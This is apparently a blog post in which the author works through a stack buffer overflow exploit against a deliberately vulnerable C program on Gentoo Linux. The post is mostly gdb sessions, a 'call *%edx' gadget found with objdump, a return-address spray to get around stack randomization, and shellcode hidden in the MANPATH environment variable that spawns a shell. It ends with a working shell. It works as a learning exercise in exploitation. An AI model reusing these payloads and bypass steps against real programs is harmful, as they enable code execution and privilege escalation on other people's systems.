MiniSky: Thoughts About Everything

From the last post, I found out.

i. jmp %esp is not possible for me.
ii. [buffer] + 4 is not possible also (atm , maybe ?)

Good thing about [buffer] + 4 will fix the ret address at the last 4 bytes, but for some reason we need to find out the real return address.
Example, jmp %esp is * 0xffffe75b : jmp *%esp , when we put in to the 4 bytes area. It will become….

$ cat abo1.c
#include

int main(int argc,char **argv) {
char buf[256];

strcpy(buf,argv[1]);
}

$ gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.1.1-r3/work/gcc-4.1.1/configure –prefix=/usr –bindir=/usr/i686-pc-linux-gnu/gcc-bin/4.1.1 –includedir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.1/include –datadir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1 –mandir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/man –infodir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/info –with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.1/include/g++-v4 –host=i686-pc-linux-gnu –build=i686-pc-linux-gnu –disable-altivec –enable-nls –without-included-gettext –with-system-zlib –disable-checking –disable-werror –enable-secureplt –disable-libunwind-exceptions –disable-multilib –disable-libmudflap –disable-libssp –disable-libgcj –enable-languages=c,c++,fortran –enable-shared –enable-threads=posix –enable-__cxa_atexit –enable-clocale=gnu
Thread model: posix
gcc version 4.1.1 (Gentoo 4.1.1-r3)

gdb>r `ruby -e ‘print “\x41″ * 256;print “\x5b\xe7\xff\xff”‘`
Failed to read a valid object file image from memory.

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:BF871784 ebx:B7F13FF4 ecx:FFFFE75B edx:BF873392 eflags:00210286
esi:B7F47CA0 edi:00000000 esp:FFFFE75B ebp:BF871800 eip:FFE1E400
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t S z a P c
[007B:FFFFE75B]———————————————————[stack]
FFFFE78B : Error while running hook_stop:
Cannot access memory at address 0xffffe78b
0xffe1e400 in ?? ()

By adjusting the first byte in “\x5b\xe7\xff\xff”, we are still able to make it jump %esp.
But %esp will be start at the 4 bytes address. This is not what we want.

Here is a quick and dirty way to by pass the protection.
If the overflow happends again.

gdb>r `ruby -e ‘print “\x41″ * 256′`
Failed to read a valid object file image from memory.

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:BFE16D34 ebx:B7EE2FF4 ecx:BFE16E00 edx:BFE17392 eflags:00210282
esi:B7F16CA0 edi:00000000 esp:BFE16E00 ebp:BFE16EA8 eip:41414141
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t S z a p c
[007B:BFE16E00]———————————————————[stack]
BFE16E30 : 41 41 41 41 00 6E E1 BF - A8 6E E1 BF 38 48 DD B7 AAAA.n…n..8H..
BFE16E20 : 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
BFE16E10 : 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
BFE16E00 : 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
[007B:B7F16CA0]———————————————————[ data]
B7F16CA0 : 00 00 00 00 00 10 00 00 - 13 06 02 00 7B 70 E1 BF …………{p..
B7F16CB0 : 04 00 00 00 70 A6 EF B7 - 03 00 00 00 64 00 00 00 ….p…….d…
[0073:41414141]———————————————————[ code]
0×41414141: Error while running hook_stop:
Cannot access memory at address 0×41414141
0×41414141 in ?? ()
gdb>x/s $edx
0xbfe17392: “LC_PAPER=en_US”

Clearly, $edx is going back the the stack. So jmp %edx or call %edx will help in this case.
To look for the right jump

$ objdump -d ./abo1 | grep edx | grep call
8048369: ff d2 call *%edx

There are two things need to be fufilled.
i. Buffer sized need to be 256
ii. Ret address is randomized. It will be anywhere within the stack.

In order to fix this part. We need to fill the stack with %edx address.

gdb>r `ruby -e ‘print “\x69\x83\x04\x08″ * 64′`
Failed to read a valid object file image from memory.

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:BF90E78D ebx:B7F53FF5 ecx:BF90E802 edx:BF910302 eflags:00210A96
esi:B7F87C9F edi:04836B08 esp:BF90E7E7 ebp:BF90E909 eip:BF91031E
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B O d I t S z A P c
[007B:BF90E7E7]———————————————————[stack]
BF90E817 : 08 69 83 04 08 69 83 04 - 08 69 83 04 08 69 83 04 .i…i…i…i..
BF90E807 : 08 69 83 04 08 69 83 04 - 08 69 83 04 08 69 83 04 .i…i…i…i..
BF90E7F7 : 94 E7 90 BF 94 E7 90 BF - 08 69 83 04 08 69 83 04 ………i…i..
BF90E7E7 : EB E7 90 BF 94 E7 90 BF - F5 3F F5 B7 02 03 91 BF ………?……
[007B:B7F87C9F]———————————————————[ data]
B7F87C9F : 00 00 00 00 00 00 10 00 - 00 13 06 02 00 DB EA 90 …………….
B7F87CAF : BF 04 00 00 00 70 B6 F6 - B7 03 00 00 00 64 00 00 …..p…….d..
[0073:BF91031E]———————————————————[ code]
0xbf91031e: ins BYTE PTR es:[edi],[dx]
0xbf91031f: outs [dx],DWORD PTR ds:[esi]
0xbf910320: arpl WORD PTR [ecx+108],sp
0xbf910323: das
0xbf910324: jae 0xbf91038e
0xbf910326: popa
——————————————————————————
0xbf91031e in ?? ()
gdb>x/5s $edx
0xbf910302: “LC_PAPER=en_US”
0xbf910311: “MANPATH=/usr/local/share/man:/usr/share/man:
/usr/share/binutilsdata/i686-pc-linux-gnu/2.16.1
/man:/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/man:
/usr/qt/3/doc/man:/opt/vmware/workstation/man”
0xbf9103d1: “KDE_MULTIHEAD=false”
0xbf9103e5: “LC_ADDRESS=en_US”
0xbf9103f6: “LC_MONETARY=en_US”
gdb>x/5s $eip
0xbf91031e: “local/share/man:/usr/share/man:
/usr/share/binutils-data/i686-pc-linux-gnu/2.16.1/man:
/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/man:/usr/qt/3/doc/man:
/opt/vmware/workstation/man”
0xbf9103d1: “KDE_MULTIHEAD=false”
0xbf9103e5: “LC_ADDRESS=en_US”
0xbf9103f6: “LC_MONETARY=en_US”
0xbf910408: “MRXVT_TABTITLE=Terminal”

If %eip starts at somewhere in side $MANPATH. Replacing values within $MANPATH will work ?

$ export MANPATH=”/usr/`ruby -e ‘print “\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80″‘`”
$ gdb -q ./abo1
gdb>r `ruby -e ‘print “\x69\x83\x04\x08″ * 64′`
Failed to read a valid object file image from memory.
sh-3.1$ uname -a
Linux muscat 2.6.19-gentoo-r5 #10 SMP Sat Feb 24 02:23:15 MYT 2007 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz GenuineIntel GNU/Linu

Bingo !!

To download this note. Goto Buffer Overflow testing on gentoo gcc 4.1.1